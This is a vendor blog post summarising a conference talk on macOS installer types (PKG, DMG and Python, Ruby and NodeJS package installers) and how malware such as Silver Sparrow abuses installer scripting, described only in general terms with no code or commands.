The Wild World of macOS Installers

A deep dive into the various types of installers used by macOS, including how they work, what they’re capable of doing (and not doing) and understanding why threat actors are increasingly packaging malicious code using these common methods to distribute malware.

October 20 2021 by

Jesus Vigo

In the “Wild World of macOS Installers” presentation, the host Tony Lambert waxes poetic about what an installer is and the different ways to install software on a macOS-based device. In Tony’s words, “an installer is going to be anything that drops additional, arbitrary, executable code onto a computer system."

Some of the different installer types used within macOS are:

  • Package (PKG)
  • DMG
  • Developer Libraries
    • Python, Ruby and NodeJS

From a security standpoint, Tony draws connections to the similarity between installers and malware. For example, both install apps and modify configuration settings are used as vessels to deliver code. The major difference between them: installers are typically from trusted sources, whereas malware isn’t.

No doubt this similarity is one of the driving reasons why threat actors are increasingly stashing malicious code, scripts and so forth within installers to increase the chance of infecting target devices. Within the presentation, Tony dives into the various installer types including highlighting how they work, explaining what tasks can and cannot be performed with them and denoting important processes used in conjunction with each installer type. He explains which are used to launch scripts or to silently install applications in the background as well as how malware like Silver Sparrow abuse these functions to infect your Mac.

The latter portion of the presentation focuses less on PKG/DMG installers and delves specifically into third-party developer installers such as those used by popular developer frameworks like Python, Ruby and NodeJS. Tony breaks down each installer's mechanism and the commands associated with calling installers. He includes the script methods used to automate installs and additional features that allow admins to execute preinstall/post-install commands when preparing environments or requiring follow-up tasks to occur after code has been installed, such as running updates, for example.

Register for JNUC to access this session as well as other sessions on-demand.

Subscribe to the Jamf Blog

Have market trends, Apple updates and Jamf news delivered directly to your inbox.

To learn more about how we collect, use, disclose, transfer, and store your information, please visit our Privacy Policy.